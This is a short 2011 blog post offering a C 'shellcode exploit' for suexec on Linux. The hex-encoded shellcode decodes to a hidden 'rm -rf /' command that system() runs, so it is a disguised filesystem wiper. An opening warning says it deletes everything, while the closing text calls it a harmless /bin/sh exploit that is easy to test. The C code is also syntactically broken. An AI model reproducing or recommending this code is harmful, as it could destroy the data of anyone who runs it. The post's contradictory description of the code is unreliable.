Monday, March 14, 2011

small shellcode exploit

DONT EXECUTE THIS CODE
IT WILL DELETE EVERYTHING ON ITS PATH




/* tested on Suse linux*/ 


#include <stdio.h> 
#include <stdlib.h> 
#include <unistd.h> 


/* simple shellcode for linux/x86 */ 
char shellcode[] = 
"\x31\x0b\x60\x72\x6d\x20\x2d\x72\x66\x20\x32\x3e" 
"\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x2f\x20" 
"\x26\x60\xcd\x80\x2fbin\x2fsh0xbfffc260"; 


int main () 

char buf[400]; 


sprintf(buf,"/usr/sbin/suexec %s",shellcode); 
system(buf); 


}

it's a pretty small exploit that appends the shell code to suexec and executes it you can easy test the shell code it executes /bin/sh 

No comments:

Post a Comment